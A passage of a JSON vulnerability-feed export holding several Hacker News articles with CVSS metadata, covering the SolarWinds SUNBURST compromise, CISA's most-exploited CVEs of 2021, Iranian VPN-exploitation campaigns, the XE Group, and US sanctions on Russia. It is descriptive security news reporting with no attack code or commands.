agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[![solarwinds backdoor](https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s728-e1000/solarwinds-backdoor.jpg)](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": "[![Software Vulnerabilities](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e1000/flaws.gif)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e100/flaws.gif>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[![Most Exploited Software Vulnerabilities](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e1000/cisa.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[![iranian apt hacking groups](https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg)](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[![VPN Flaws to Compromise Enterprise Networks](https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg)](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[![Iranian hackers](https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg)](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-01T16:21:29", "description": "[![Cybercrime Kingpin](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiRXwjJ2SJY2WItS7sHSTBTeKhOuoWZcJd5uh9k-fbGc8gH1YtBtB9CiCifJEGCflz6ZxFbNb5rQAQ0_YqfLfeN176Qz8JR8Ub-dU_P9eLMBH_pwGPdzRsv2ho3au00d4XggdypW7hZ4MnhsZGjBzaNLNeBIn9H045iynXe6NHJjFrGSNfnVwcajKmv/s728-e365/hacker.jpg>)\n\nCybersecurity researchers have unmasked the identity of one of the individuals who is believed to be associated with the e-crime actor known as **XE Group**.\n\nAccording to [Menlo Security](<https://www.menlosecurity.com/blog/not-your-average-joe-an-analysis-of-the-xegroups-attack-techniques/>), which pieced together the information from different online sources, \"Nguyen Huu Tai, who also goes by the names Joe Nguyen and Thanh Nguyen, has the strongest likelihood of being involved with the XE Group.\"\n\nXE Group (aka XeThanh), previously documented by [Malwarebytes](<https://www.malwarebytes.com/blog/news/2020/07/credit-card-skimmer-targets-asp-net-sites>) and [Volexity](<https://www.volexity.com/blog/2021/12/07/xe-group-exposed-8-years-of-hacking-card-skimming-for-profit/>), has a history of carrying out cyber criminal activities since at least 2013. It's suspected to be a threat actor of Vietnamese origin.\n\nSome of the entities targeted by the threat actor span government agencies, construction organizations, and healthcare sectors.\n\nIt's known to compromise internet-exposed servers with known exploits and monetize the intrusions by installing password theft or [credit card skimming code](<https://thehackernews.com/2023/04/attention-online-shoppers-dont-be.html>) for online services.\n\n\"As far back as 2014, the threat actor was seen creating [AutoIT scripts](<https://en.wikipedia.org/wiki/AutoIt>) that automatically generated emails and a rudimentary credit card validator for stolen credit cards,\" the cybersecurity company said.\n\n[![Cybercrime Kingpin](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjQ2VzxFCtmuSepHl-d3zHE7XQEBiq8xiE5EFfY0zMTXmeDvRihUs93wGwoZXszCxSro7-FZePBkC2Hyx8YEBcqPrVZuIelXSJrkHD6yNlpRdJY0zMrOrDIQE1KVCKRPMtUIcexffgYIwTQVBwQM-o8Nz6bGAVqhe9k-7hq_yy1TNrZ2yrAyOAuCt9H/s728-e365/code.jpg>)\n\nEarlier this March, U.S. cybersecurity and intelligence authorities [revealed](<https://thehackernews.com/2023/03/multiple-hacker-groups-exploit-3-year.html>) XE Group's attempts to exploit a critical three-year-old security flaw in Progress Telerik devices (CVE-2019-18935, CVSS score: 9.8) to obtain a foothold.\n\nUPCOMING WEBINAR\n\n\ud83d\udd10 Mastering API Security: Understanding Your True Attack Surface\n\nDiscover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!\n\n[Join the Session](<https://thn.news/z-inside-2>)\n\nThe adversary has also attempted to gain access to corporate networks in the past through phishing emails sent out using fraudulent domains mimicking legitimate companies such as PayPal and eBay.\n\nBesides camouflaging .EXE files as .PNG files to avoid detection, select attacks have employed a web shell dubbed [ASPXSpy](<https://attack.mitre.org/software/S0073/>) to gain control of vulnerable systems.\n\n\"XE Group remains a continued threat to various sectors, including government agencies, construction organizations, and healthcare providers,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-01T14:55:00", "type": "thn", "title": "Unmasking XE Group: Experts Reveal Identity of Suspected Cybercrime Kingpin", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2023-06-01T14:55:37", "id": "THN:E9A6FFB34DA1C49F512A7AE269951D50", "href": "https://thehackernews.com/2023/06/unmasking-xe-group-experts-reveal.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[![](https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg)](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[![](https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg)](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[![](https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg)](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[![](https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg)](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into 